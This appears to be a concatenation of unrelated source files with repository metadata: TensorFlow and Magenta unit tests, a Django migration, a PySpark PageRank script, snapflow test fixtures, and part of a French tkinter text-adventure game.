] | permissive | 911gt3/tensorflow | a6728e86100a2d5328280cfefcfa8e7c8de24c4c | 423ea74f41d5f605933a9d9834fe2420989fe406 | refs/heads/master | 2023-04-09T14:27:29.072195 | 2023-04-03T06:20:23 | 2023-04-03T06:22:54 | 258,948,634 | 0 | 0 | Apache-2.0 | 2020-04-26T05:36:59 | 2020-04-26T05:36:58 | null | UTF-8 | Python | false | false | 8,517 | py | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for loss scaling utilities in tensorflow.ops.nn."""
from absl.testing import parameterized
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import strategy_combinations
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import nn_impl
from tensorflow.python.platform import test as test_lib
class LossUtilitiesTest(test_lib.TestCase, parameterized.TestCase):
def testComputeAverageLossGlobalBatchSize(self):
per_example_loss = [1, 2, 3, 4, 5]
loss = nn_impl.compute_average_loss(per_example_loss, global_batch_size=10)
self.assertEqual(self.evaluate(loss), 1.5)
def testComputeAverageLossGlobalBatchSize_BatchSizeNonScalar(self):
per_example_loss = [1, 2, 3, 4, 5]
with self.assertRaisesWithPredicateMatch(
ValueError, "global_batch_size must be scalar"):
nn_impl.compute_average_loss(per_example_loss, global_batch_size=[10])
def testComputeAverageLossGlobalBatchSize_BatchSizeFloat(self):
per_example_loss = [1, 2, 3, 4, 5]
with self.assertRaisesWithPredicateMatch(
TypeError, "global_batch_size must be an int"):
nn_impl.compute_average_loss(per_example_loss, global_batch_size=10.0)
def testComputeAverageLossGlobalBatchSize_BatchSizeNegative(self):
per_example_loss = [1, 2, 3, 4, 5]
with self.assertRaisesWithPredicateMatch(
errors_impl.InvalidArgumentError, "global_batch_size must be positive"):
nn_impl.compute_average_loss(per_example_loss, global_batch_size=-1)
def testComputeAverageLossGlobalBatchSize_BatchSizeZero(self):
per_example_loss = [1, 2, 3, 4, 5]
with self.assertRaisesWithPredicateMatch(
errors_impl.InvalidArgumentError, "global_batch_size must be positive"):
nn_impl.compute_average_loss(per_example_loss, global_batch_size=0)
@combinations.generate(
combinations.combine(
distribution=[strategy_combinations.mirrored_strategy_with_two_cpus],
mode=["graph", "eager"],
)
)
def testComputeAverageLossDefaultGlobalBatchSize(self, distribution):
# Without strategy - num replicas = 1
per_example_loss = constant_op.constant([2.5, 6.2, 5.])
loss = nn_impl.compute_average_loss(per_example_loss)
self.assertAllClose(self.evaluate(loss), (2.5 + 6.2 + 5.) / 3)
# With strategy - num replicas = 2
with distribution.scope():
per_replica_losses = distribution.run(
nn_impl.compute_average_loss, args=(per_example_loss,))
loss = distribution.reduce("SUM", per_replica_losses, axis=None)
self.assertAllClose(self.evaluate(loss), (2.5 + 6.2 + 5.) / 3)
@combinations.generate(
combinations.combine(
distribution=[strategy_combinations.mirrored_strategy_with_two_cpus],
mode=["graph", "eager"],
)
)
def testComputeAverageLossSampleWeights(self, distribution):
with distribution.scope():
# Scalar sample weight
per_replica_losses = distribution.run(
nn_impl.compute_average_loss,
args=([2., 4., 6.],),
kwargs={"sample_weight": 2})
loss = distribution.reduce("SUM", per_replica_losses, axis=None)
self.assertAllClose(self.evaluate(loss), (2. + 4. + 6.) * 2. / 3)
# Per example sample weight
per_replica_losses = distribution.run(
nn_impl.compute_average_loss,
args=([2., 4., 6.],),
kwargs={"sample_weight": [0.3, 0.5, 0.2]})
loss = distribution.reduce("SUM", per_replica_losses, axis=None)
self.assertAllClose(
self.evaluate(loss), (2. * 0.3 + 4. * 0.5 + 6. * 0.2) / 3)
# Time-step sample weight
per_replica_losses = distribution.run(
nn_impl.compute_average_loss,
args=([[2., 0.5], [4., 1.]],),
kwargs={"sample_weight": [[0.3, 0.7], [0.2, 0.8]]})
loss = distribution.reduce("SUM", per_replica_losses, axis=None)
self.assertAllClose(
self.evaluate(loss), (2. * 0.3 + 0.5 * 0.7 + 4. * 0.2 + 1. * 0.8) / 2)
def testComputeAverageLossInvalidSampleWeights(self):
with self.assertRaisesIncompatibleShapesError(
(ValueError, errors_impl.InvalidArgumentError)):
nn_impl.compute_average_loss([2.5, 6.2, 5.],
sample_weight=[0.2, 0.8],
global_batch_size=10)
@combinations.generate(
combinations.combine(
distribution=[strategy_combinations.mirrored_strategy_with_two_cpus],
mode=["graph", "eager"],
)
)
def testComputeAverageLossDtype(self, distribution):
with distribution.scope():
per_example_loss = constant_op.constant([2., 4., 6.],
dtype=dtypes.float64)
per_replica_losses = distribution.run(
nn_impl.compute_average_loss,
args=(per_example_loss,),
kwargs={"sample_weight": 2})
loss = distribution.reduce("SUM", per_replica_losses, axis=None)
self.assertEqual(loss.dtype, dtypes.float64)
def testComputeAverageLossInvalidRank(self):
per_example_loss = constant_op.constant(2)
# Static rank
with self.assertRaisesRegex(
ValueError, "Invalid value passed for `per_example_loss`. "
"Expected a tensor with at least rank 1."):
nn_impl.compute_average_loss(per_example_loss)
with context.graph_mode():
# Dynamic rank
per_example_loss = array_ops.placeholder(dtype=dtypes.float32)
loss = nn_impl.compute_average_loss(per_example_loss)
with self.cached_session() as sess:
with self.assertRaisesRegex(
errors.InvalidArgumentError,
"Invalid value passed for `per_example_loss`. "
"Expected a tensor with at least rank 1."):
sess.run(loss, {per_example_loss: 2})
@combinations.generate(
combinations.combine(
distribution=[strategy_combinations.mirrored_strategy_with_two_cpus],
mode=["graph", "eager"],
)
)
def testComputeAverageLossInCrossReplicaContext(self, distribution):
with distribution.scope():
with self.assertRaisesRegex(
RuntimeError,
"You are calling `compute_average_loss` in cross replica context"):
nn_impl.compute_average_loss([2, 3])
@combinations.generate(
combinations.combine(
distribution=[strategy_combinations.mirrored_strategy_with_two_cpus],
mode=["graph", "eager"],
)
)
def testScaleRegularizationLoss(self, distribution):
# Without strategy - num replicas = 1
reg_losses = constant_op.constant([2.5, 6.2, 5.])
loss = nn_impl.scale_regularization_loss(reg_losses)
self.assertAllClose(self.evaluate(loss), (2.5 + 6.2 + 5.))
# With strategy - num replicas = 2
with distribution.scope():
per_replica_losses = distribution.run(
nn_impl.scale_regularization_loss, args=(reg_losses,))
loss = distribution.reduce("SUM", per_replica_losses, axis=None)
self.assertAllClose(self.evaluate(loss), (2.5 + 6.2 + 5.))
@combinations.generate(
combinations.combine(
distribution=[strategy_combinations.mirrored_strategy_with_two_cpus],
mode=["graph", "eager"],
)
)
def testScaleRegularizationLossInCrossReplicaContext(self, distribution):
with distribution.scope():
with self.assertRaisesRegex(
RuntimeError, "You are calling `scale_regularization_loss` in "
"cross replica context"):
nn_impl.scale_regularization_loss([2, 3])
if __name__ == "__main__":
test_lib.main()
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
4c8257be407ae5d6604039ed1d3ef77cf90b98a1 | 7fd39373c9f53a92b406e18f59ac1b831e6399a2 | /accounts/migrations/0002_lover.py | c08b49659abd1c486470e1e52ad6a098bc677b56 | [] | no_license | aahmedsamy/l-backend | 5809cdf7af879458aef2c7a257861fd2f15fefca | 751c0a5121b6271a4c5f658b661680737e036054 | refs/heads/master | 2022-09-30T12:37:13.601137 | 2020-06-05T09:11:55 | 2020-06-05T09:11:55 | 212,978,960 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 829 | py | # Generated by Django 2.2.6 on 2019-10-08 22:59
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('accounts', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Lover',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('female', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='female_user', to=settings.AUTH_USER_MODEL, unique=True)),
('male', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='male_user', to=settings.AUTH_USER_MODEL, unique=True)),
],
),
]
| [
"aahmedsamy.as@gmail.com"
] | aahmedsamy.as@gmail.com |
e1341887af6e4a64307c55e2244b898adc56e6ab | 4cfbf85d5e14469a3f921a991f98782d1f28b2a7 | /pyspark/pagerank.py | d7ce1e903c99e891b6e115f90e92482ed4ffea9b | [] | no_license | jdepreter/ir-pagerank | cb7344a9bf0c92517f86015c32d4d1906214f76e | 24a957be358e5dd37de9e2b24868940732c930fa | refs/heads/master | 2023-01-31T03:39:39.449783 | 2020-12-14T11:21:59 | 2020-12-14T11:21:59 | 314,180,902 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,763 | py | import pprint
import findspark
findspark.init()
import pyspark
from pyspark import SparkContext, SparkConf, SQLContext
from pyspark.sql import SparkSession
inputfile = "../data/ClueWeb09_WG_50m_numbered.graph-txt"
alpha = float(0.15) # Teleportation probability
epsilon = 0.000001 # 10^-6
outputdir = "big0.15.csv"
config = pyspark.SparkConf().setAll([('spark.executor.memory', '8g'), ('spark.executor.cores', '3'), ('spark.cores.max', '3'), ('spark.driver.memory','8g')]) \
.setAppName('appName').setMaster('local[*]')
sc = pyspark.SparkContext(conf=config)
spark = SparkSession(sc)
am_nodes = 428136613
# Adjacency list
links = sc.textFile(inputfile)
links = links.map(lambda node: (node.split(".")[0], (node.split(".")[1].split(' ') if node.split(".")[1] != '' else []))) # [ (source, [destinations]), ... ]
links = links.filter(lambda node: node[0] != '-1')
ranks = links.map(lambda node: (node[0], 1.0 / am_nodes))
base_ranks = links.map(lambda x: (x[0], alpha / am_nodes))
iteration = 0
error = 1
while error > epsilon:
new_ranks = links.join(ranks).flatMap(lambda x : [(i, (1-alpha) * float(x[1][1])/len(x[1][0])) for i in x[1][0]])
# print(new_ranks.take(10))
new_ranks = sc.union([new_ranks, base_ranks])
# print(new_ranks.take(10))
new_ranks = new_ranks.reduceByKey(lambda x,y: x+y)
error_rdd = new_ranks.union(ranks).reduceByKey(lambda x, y: abs(x-y)).map(lambda x: x[1])
# print(error_rdd.take(10))
error = error_rdd.reduce(max)
# print(error)
ranks = new_ranks
print(f"Iteration {iteration} with error {error}")
iteration += 1
break
ranks = ranks.sortBy(lambda node: -node[1])
print(ranks.take(10))
df = ranks.toDF()
df.repartition(1).write.csv(outputdir) | [
"jolan.depreter@gmail.com"
] | jolan.depreter@gmail.com |
3dd6b2986f6fd886dd1179e7b456bb349f201ad3 | e9156143e706fa7981f531dafb4fec72f42d9d78 | /snapflow_bi/functions/transaction_ltv_model/tests/test_transaction_ltv_model.py | 637af7409b431737d5b34b8640b2f23d389eff06 | [
"BSD-3-Clause"
] | permissive | kvh/snapflow-bi | b5a00b4c8902e663b400e4831da53ce7d1888a21 | 2e0877b19fb0738ba384b798ad1c5c33c4b3111e | refs/heads/master | 2023-06-07T20:27:16.467895 | 2021-06-18T15:17:20 | 2021-06-18T15:17:20 | 308,482,793 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,809 | py | inputs = {
"transactions": dict(
data="""
customer_id,transacted_at,amount
1,2020-01-01 00:00:00,100
2,2020-02-01 00:00:00,100
2,2020-03-01 00:00:00,100
3,2020-01-01 00:00:00,300
3,2020-04-01 00:00:00,400
4,2020-01-01 00:00:00,100
4,2020-02-01 00:00:00,100
4,2020-03-01 00:00:00,50
5,2020-01-01 00:00:00,1000
""",
schema="bi.Transaction",
)
}
outputs = {
"default": """
customer_id,ltv
1,100
2,100
3,400
4,50
5,1000
"""
}
# from __future__ import annotations
# from dcp.storage.database.utils import get_tmp_sqlite_db_url
# from snapflow import Environment, graph, produce
# from snapflow.testing.utils import str_as_dataframe
# def test_ltv():
# from snapflow_bi import module as bi
# input_data = """
# customer_id,transacted_at,amount
# 1,2020-01-01 00:00:00,100
# 2,2020-02-01 00:00:00,100
# 2,2020-03-01 00:00:00,100
# 3,2020-01-01 00:00:00,300
# 3,2020-04-01 00:00:00,400
# 4,2020-01-01 00:00:00,100
# 4,2020-02-01 00:00:00,100
# 4,2020-03-01 00:00:00,50
# 5,2020-01-01 00:00:00,1000
# """
# env = Environment(metadata_storage=get_tmp_sqlite_db_url())
# txs = str_as_dataframe(env, input_data, nominal_schema=bi.schemas.Transaction)
# g = graph()
# df = g.create_node(
# "core.import_dataframe", params={"dataframe": txs, "schema": "bi.Transaction"}
# )
# ltv = g.create_node(bi.functions.transaction_ltv_model, upstream=df)
# blocks = produce(ltv, env=env, modules=[bi])
# output_df = blocks[0].as_dataframe()
# assert len(output_df) == 5
# assert set(output_df["customer_id"]) == set(i for i in range(1, 6))
| [
"kenvanharen@gmail.com"
] | kenvanharen@gmail.com |
2211df4948417b4a5f75d899942dee9fef97d367 | c2c49af335789153dd5181868348532ab0d24912 | /funkcijanaloga5.py | aa3c3ff9f465529357eee59dda361dc90bc2253d | [] | no_license | Elerimlmao/Python-2020 | 04ec5026798095cafcb56be5b218fbf37d793b96 | d33640aa47fca6bb305121436be7de4a5856309b | refs/heads/master | 2020-12-10T11:28:21.949957 | 2020-01-16T22:02:26 | 2020-01-16T22:02:26 | 233,581,475 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 88 | py | list1 = [1, 2, 3, 4, 5, 6, 7, 8, 9]
print("Največje število v listu je ", max(list1))
| [
"noreply@github.com"
] | noreply@github.com |
3274b9a98d47833d3d76ef809e94da84a57f07b0 | 9d30498c2dd82670adeb23d75cdf984e37c25510 | /magenta/music/chords_lib_test.py | f9f704ff9389301ef8351a1ac053d7a8bcc0a8b4 | [
"Apache-2.0"
] | permissive | WhiteSymmetry/magenta | 3f363ca183fa6c4b2def8c3a04dc4f3ced1b8d41 | 92bc70ba0bf8355c73fba9a7bcd25de50fc58862 | refs/heads/master | 2021-01-13T10:04:16.441375 | 2016-10-27T18:26:11 | 2016-10-27T18:26:11 | 72,141,979 | 1 | 0 | null | 2016-10-27T19:40:02 | 2016-10-27T19:40:00 | Python | UTF-8 | Python | false | false | 9,538 | py | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for chords_lib."""
# internal imports
import tensorflow as tf
from magenta.music import chord_symbols_lib
from magenta.music import chords_lib
from magenta.music import constants
from magenta.music import melodies_lib
from magenta.music import sequences_lib
from magenta.music import testing_lib
NO_CHORD = constants.NO_CHORD
class ChordsLibTest(tf.test.TestCase):
def setUp(self):
self.quantized_sequence = sequences_lib.QuantizedSequence()
self.quantized_sequence.qpm = 60.0
self.quantized_sequence.steps_per_quarter = 4
def testTranspose(self):
# Transpose ChordProgression with basic triads.
events = ['Cm', 'F', 'B-', 'E-']
chords = chords_lib.ChordProgression(events)
chords.transpose(transpose_amount=7)
expected = ['Gm', 'C', 'F', 'B-']
self.assertEqual(expected, list(chords))
# Transpose ChordProgression with more complex chords.
events = ['Esus2', 'B13', 'A7/B', 'F#dim']
chords = chords_lib.ChordProgression(events)
chords.transpose(transpose_amount=-2)
expected = ['Dsus2', 'A13', 'G7/A', 'Edim']
self.assertEqual(expected, list(chords))
# Transpose ChordProgression containing NO_CHORD.
events = ['C', 'B-', NO_CHORD, 'F', 'C']
chords = chords_lib.ChordProgression(events)
chords.transpose(transpose_amount=4)
expected = ['E', 'D', NO_CHORD, 'A', 'E']
self.assertEqual(expected, list(chords))
def testTransposeUnknownChordSymbol(self):
# Attempt to transpose ChordProgression with unknown chord symbol.
events = ['Cm', 'G7', 'P#13', 'F']
chords = chords_lib.ChordProgression(events)
with self.assertRaises(chord_symbols_lib.ChordSymbolException):
chords.transpose(transpose_amount=-4)
def testFromQuantizedSequence(self):
testing_lib.add_quantized_chords_to_sequence(
self.quantized_sequence,
[('Am', 4), ('D7', 8), ('G13', 12), ('Csus', 14)])
chords = chords_lib.ChordProgression()
chords.from_quantized_sequence(
self.quantized_sequence, start_step=0, end_step=16)
expected = [NO_CHORD, NO_CHORD, NO_CHORD, NO_CHORD,
'Am', 'Am', 'Am', 'Am', 'D7', 'D7', 'D7', 'D7',
'G13', 'G13', 'Csus', 'Csus']
self.assertEqual(expected, list(chords))
def testFromQuantizedSequenceWithinSingleChord(self):
testing_lib.add_quantized_chords_to_sequence(
self.quantized_sequence, [('F', 0), ('Gm', 8)])
chords = chords_lib.ChordProgression()
chords.from_quantized_sequence(
self.quantized_sequence, start_step=4, end_step=6)
expected = ['F'] * 2
self.assertEqual(expected, list(chords))
def testFromQuantizedSequenceWithNoChords(self):
chords = chords_lib.ChordProgression()
chords.from_quantized_sequence(
self.quantized_sequence, start_step=0, end_step=16)
expected = [NO_CHORD] * 16
self.assertEqual(expected, list(chords))
def testFromQuantizedSequenceWithCoincidentChords(self):
testing_lib.add_quantized_chords_to_sequence(
self.quantized_sequence,
[('Am', 4), ('D7', 8), ('G13', 12), ('Csus', 12)])
chords = chords_lib.ChordProgression()
with self.assertRaises(chords_lib.CoincidentChordsException):
chords.from_quantized_sequence(
self.quantized_sequence, start_step=0, end_step=16)
def testExtractChords(self):
self.quantized_sequence.steps_per_quarter = 1
testing_lib.add_quantized_chords_to_sequence(
self.quantized_sequence, [('C', 2), ('G7', 6), ('F', 8)])
self.quantized_sequence.total_steps = 10
chord_progressions, _ = chords_lib.extract_chords(self.quantized_sequence)
expected = [[NO_CHORD, NO_CHORD, 'C', 'C', 'C', 'C', 'G7', 'G7', 'F', 'F']]
self.assertEqual(expected, [list(chords) for chords in chord_progressions])
def testExtractChordsAllTranspositions(self):
self.quantized_sequence.steps_per_quarter = 1
testing_lib.add_quantized_chords_to_sequence(
self.quantized_sequence, [('C', 1)])
self.quantized_sequence.total_steps = 2
chord_progressions, _ = chords_lib.extract_chords(self.quantized_sequence,
all_transpositions=True)
expected = zip([NO_CHORD] * 12, ['G-', 'G', 'A-', 'A', 'B-', 'B',
'C', 'D-', 'D', 'E-', 'E', 'F'])
self.assertEqual(expected, [tuple(chords) for chords in chord_progressions])
def testExtractChordsForMelodies(self):
self.quantized_sequence.steps_per_quarter = 1
testing_lib.add_quantized_track_to_sequence(
self.quantized_sequence, 0,
[(12, 100, 2, 4), (11, 1, 6, 11)])
testing_lib.add_quantized_track_to_sequence(
self.quantized_sequence, 1,
[(12, 127, 2, 4), (14, 50, 6, 8),
(50, 100, 33, 37), (52, 100, 34, 37)])
testing_lib.add_quantized_chords_to_sequence(
self.quantized_sequence,
[('C', 2), ('G7', 6), ('Cmaj7', 33)])
melodies, _ = melodies_lib.extract_melodies(
self.quantized_sequence, min_bars=1, gap_bars=2, min_unique_pitches=2,
ignore_polyphonic_notes=True)
chord_progressions, _ = chords_lib.extract_chords_for_melodies(
self.quantized_sequence, melodies)
expected = [[NO_CHORD, NO_CHORD, 'C', 'C', 'C', 'C',
'G7', 'G7', 'G7', 'G7', 'G7'],
[NO_CHORD, NO_CHORD, 'C', 'C', 'C', 'C', 'G7', 'G7'],
['G7', 'Cmaj7', 'Cmaj7', 'Cmaj7', 'Cmaj7']]
self.assertEqual(expected, [list(chords) for chords in chord_progressions])
def testExtractChordsForMelodiesCoincidentChords(self):
self.quantized_sequence.steps_per_quarter = 1
testing_lib.add_quantized_track_to_sequence(
self.quantized_sequence, 0,
[(12, 100, 2, 4), (11, 1, 6, 11)])
testing_lib.add_quantized_track_to_sequence(
self.quantized_sequence, 1,
[(12, 127, 2, 4), (14, 50, 6, 8),
(50, 100, 33, 37), (52, 100, 34, 37)])
testing_lib.add_quantized_chords_to_sequence(
self.quantized_sequence,
[('C', 2), ('G7', 6), ('E13', 8), ('Cmaj7', 8)])
melodies, _ = melodies_lib.extract_melodies(
self.quantized_sequence, min_bars=1, gap_bars=2, min_unique_pitches=2,
ignore_polyphonic_notes=True)
chord_progressions, stats = chords_lib.extract_chords_for_melodies(
self.quantized_sequence, melodies)
expected = [[NO_CHORD, NO_CHORD, 'C', 'C', 'C', 'C', 'G7', 'G7'],
['Cmaj7', 'Cmaj7', 'Cmaj7', 'Cmaj7', 'Cmaj7']]
stats_dict = dict([(stat.name, stat) for stat in stats])
self.assertIsNone(chord_progressions[0])
self.assertEqual(expected,
[list(chords) for chords in chord_progressions[1:]])
self.assertEqual(stats_dict['coincident_chords'].count, 1)
def testToSequence(self):
chords = chords_lib.ChordProgression(
[NO_CHORD, 'C7', 'C7', 'C7', 'C7', 'Am7b5', 'F6', 'F6', NO_CHORD])
sequence = chords.to_sequence(sequence_start_time=2, qpm=60.0)
self.assertProtoEquals(
'ticks_per_quarter: 220 '
'tempos < qpm: 60.0 > '
'text_annotations < '
' text: "C7" time: 2.25 annotation_type: CHORD_SYMBOL '
'> '
'text_annotations < '
' text: "Am7b5" time: 3.25 annotation_type: CHORD_SYMBOL '
'> '
'text_annotations < '
' text: "F6" time: 3.5 annotation_type: CHORD_SYMBOL '
'> '
'text_annotations < '
' text: "N.C." time: 4.0 annotation_type: CHORD_SYMBOL '
'> ',
sequence)
class MajorMinorEncoderDecoderTest(tf.test.TestCase):
def setUp(self):
self.encoder_decoder = chords_lib.MajorMinorEncoderDecoder()
def testEncodeNoChord(self):
index = self.encoder_decoder.encode_chord(NO_CHORD)
self.assertEquals(0, index)
def testEncodeChord(self):
# major triad
index = self.encoder_decoder.encode_chord('C')
self.assertEquals(1, index)
# minor triad
index = self.encoder_decoder.encode_chord('Cm')
self.assertEquals(13, index)
# dominant 7th
index = self.encoder_decoder.encode_chord('F7')
self.assertEquals(6, index)
# minor 9th
index = self.encoder_decoder.encode_chord('A-m9')
self.assertEquals(21, index)
def testEncodeThirdlessChord(self):
# suspended chord
with self.assertRaises(chords_lib.ChordEncodingException):
self.encoder_decoder.encode_chord('Gsus4')
# power chord
with self.assertRaises(chords_lib.ChordEncodingException):
self.encoder_decoder.encode_chord('B-5')
def testDecodeNoChord(self):
figure = self.encoder_decoder.decode_chord(0)
self.assertEquals(NO_CHORD, figure)
def testDecodeChord(self):
# major chord
figure = self.encoder_decoder.decode_chord(3)
self.assertEquals('D', figure)
# minor chord
figure = self.encoder_decoder.decode_chord(17)
self.assertEquals('Em', figure)
if __name__ == '__main__':
tf.test.main()
| [
"noreply@github.com"
] | noreply@github.com |
6a11fe9adff857a928b0588d1bfac4ecdd95741e | 9f83ef9c27c612cd210bc1abde7c91d2b0e8a552 | /A Night Game.py | fc1d744ef64ce2b52fff21812721feebb66f6298 | [] | no_license | Phoenix99Ash/Fichiers | 2d2d283f79684ebacb5a206fafe24c9cd1d130dd | e0d9adbb7ee13d1e4607242505b9e1206b3f1008 | refs/heads/master | 2021-05-20T23:13:39.892326 | 2020-04-02T13:37:47 | 2020-04-02T13:37:47 | 252,448,430 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28,486 | py | from tkinter import*
from tkinter.messagebox import *
from tkinter.filedialog import *
#Ouverture de la feneêtre
menu = Tk()
menu.title('A night game - fenêtre principale')
a = 0
b = 0
nombredemort = 0
voiture = "propre"
combat = "gagné"
qui = "un mari honnête"
rob = "blanche et courte"
#Effaçage et ouverture d'une nouvelle fenêtre
def entrer():
for w in menu.winfo_children():
w.destroy()
menu.pack_propagate(0)#si on veut que la fenetre ne se redimentionne pas
lab = Label(menu, fg='black', text= "-Synopsis-", font=("arial", 10, "bold italic"))
lab.pack()
text = Label(menu,width=10,height=5, fg='red', text= "Bienvenue", font=("arial", 50, "bold italic"))
text.pack()
contin = Label(menu,width = 50, height = 5, text = "appuyez sur la flèche droite pour continuer", font=("arial",10,"bold italic"))
contin.pack(side = BOTTOM)
text.focus_set()
text.bind("<Key>", clavier)
#Définition des touches
def clavier(event):
touche = event.keysym
if touche == "Return":
commencer()
if touche == "Down":
interdiction()
if touche == "Right" :
for w in menu.winfo_children():
w.destroy()
menu.pack_propagate(0)
lab = Label(menu, fg='black', text = "-Synopsis-", font=("arial", 10 , "bold italic"))
lab.pack()
text = Label(menu,width=10,height=5, fg='red', text= "Bienvenue", font=("arial", 50, "bold italic"))
contin = Label(menu,width = 50, height = 5, text = "appuyez sur la flèche droite pour continuer", font=("arial",10,"bold italic"))
contin.pack(side = BOTTOM)
showwarning('Explication',"Il est 21h du soir au moment où Sébastian, agent de police..et gardien de la paix avant tout, rentre chez lui. C'est l'occasion pour lui de fêter l'anniversaire de son mariage avec sa femme, Sophia. Il habite dans une villa, très calme aux alentours des voisins.")
if touche == "Right" :
for w in menu.winfo_children():
w.destroy()
menu.pack_propagate(0)
lab = Label(menu, fg='black', text = "-Vous êtes devant votre garage-", font=("arial", 10 , "bold italic"))
lab.pack()
showinfo("Arrivé chez lui","Sébastian gare sa voiture devant son garage. Cependant, en sortant de sa voiture, il constate qu'il a oublié le cadeau ! ")
Button(menu,width = 50, height = 5, text ="vous décidez d'aller faire les boutiques",font=(1000000), command=shopping).pack(side=LEFT, padx=5, pady=5)
Button(menu,width = 50, height =5, text ="vous décidez d'entrer chez vous quand même",font=(1000000),command=maison).pack(side=RIGHT, padx=5, pady=5)
if touche == "Left" :
for w in menu.winfo_children():
w.destroy()
menu.pack_propagate(0)
lab = Label(menu, fg='black', text = "-Synopsis-", font=("arial", 10 , "bold italic"))
lab.pack()
showinfo('Vous',"Wow..Vous êtes mauvais..Il est mort à cause de vous. Nous ne sommes pas tous né parfait, il faut apprendre du passé")
showwarning('Explication',"Il est 21h du soir au moment où Sébastian, agent de police..et gardien de la paix avant tout, rentre chez lui. C'est l'occasion pour lui de fêter l'anniversaire de son mariage avec sa femme, Sophia. Il habite dans une villa, très calme aux alentours des voisins.")
lab = Label(menu, fg='black', text = "-Vous êtes devant votre garage-", font=("arial", 10 , "bold italic"))
lab.pack()
showinfo("L'arrivée chez lui","Sébastian gare sa voiture devant son garage. Cependant, en sortant de sa voiture, il constate qu'il a oublié le cadeau ! ")
Button(menu,width = 70, height = 5, text ="Vous décidez d'aller lentement dans la maison, en faisant énormément de bruit",font=(1000000), command=rentrerl).pack(side=TOP, padx=5, pady=5)#Commencer à partir d'ici les nouveau choix avec de nouvelle option, sachant que les cambrioleurs vont soit ne pas être là, soit s'enfuir car il est rentrer trop rapidement, suivre le scénar de Eric après ça
Button(menu,width = 70, height =5, text ="Vous décidez d'entrer chez vous après quelques minutes d'attente",font=(1000000),command=rentrerf).pack(side=BOTTOM, padx=5, pady=5)
def rentrerl():
for w in menu.winfo_children():
w.destroy()
menu.pack_propagate(0)
lab = Label(menu, fg='black', text = "-Vous êtes dans votre maison-", font=("arial", 10 , "bold italic"))
lab.pack()
Button(menu,width = 50, height = 5, text ="Vous décidez d'aller faire les boutiques",font=(1000000), command=shopping).pack(side=LEFT, padx=5, pady=5)
Button(menu,width = 50, height =5, text ="Vous décidez d'entrer chez vous quand même",font=(1000000),command=maison).pack(side=RIGHT, padx=5, pady=5)
showinfo('Entrée lente',"Sebastian entre lentement dans la maison")
showinfo('Entrée lente',"Il remarque la présence d'homme cagoulé dans leur jardin, mais ils fuient en voyant Sebastian")
showinfo('Entrée lente',"Il entre en gardant son calme et soudain « Coucou chéri ! ». Cette voix provenait de la cuisine. Sophia se dépêche de voir Sébastian.")
showinfo('Entrée lente',"<<Tu as apporté mon cadeau ?>>")
showinfo('Entrée lente',"Elle a toujours eu les yeux en face des trous..Parsemant le portefeuille de Sebastian, il aimait ça chez elle.")
prepenigme2()
Enigme2()
def rentrerf():
for w in menu.winfo_children():
w.destroy()
menu.pack_propagate(0)
lab = Label(menu, fg='black', text = "-Vous êtes dans votre maison-", font=("arial", 10 , "bold italic"))
lab.pack()
showinfo('Entrée attente',"Sébastian entre lentement dans la maison")
showinfo('Entrée attente',"Il remarque la présence d'homme cagoulé dans leur maison, mais ils fuient en voyant Sebastian")
showinfo('Entrée attente',"Il entre en gardant son calme et soudain « Coucou chéri ! ». Cette voix provenait de la cuisine. Sophia se dépêche de voir Sébastian.")
showinfo('Entrée attente',"Tu as apporté mon cadeau ?")
showinfo('Entrée attente',"Elle a toujours eu les yeux en face des trous..Parsemant le portefeuille de Sébastian, il aimait ça chez elle")
prepenigme2()
def prepenigme2():
for w in menu.winfo_children():
w.destroy()
menu.pack_propagate(0)
lab = Label(menu, fg='black', text = "-Vous êtes dans votre maison-", font=("arial", 10 , "bold italic"))
lab.pack()
Button(menu,width = 50, height = 5, text ="Vous décidez de lui mentir",font=(1000000), command=Enigme2).pack(side=LEFT, padx=5, pady=5)
Button(menu,width = 50, height =5, text ="Vous décidez de lui dire la vérité",font=(1000000),command=verite).pack(side=RIGHT, padx=5, pady=5)
def Enigme2():
showwarning('Enigme 2',"Tentez de convaincre votre femme en résolvant cette énigme !")
enigme2 = Tk()
enigme2.title('Enigme 2')
frame = Frame(enigme2, bg="ivory", borderwidth=2)
frame.pack(side=TOP, padx=5, pady=5)
Label(frame,width = 40, height = 5, fg = 'red', text='Peut-on remonter dans le temps ?',bg="ivory", font =("arial",30, "bold italic")).pack(padx=5, pady=5)
Button(enigme2,width = 10, height = 5, text ='Oui',font=(1000000), command=reussi2a).pack(side=LEFT, padx=5, pady=5)
Button(enigme2,width = 10, height =5, text ='Non',font=(1000000),command=reussi2b).pack(side=RIGHT, padx=5, pady=5)
def reussi2a():
showwarning('Woohoo !Tu gères !',"Alors pourquoi tenter d'avancer ?")
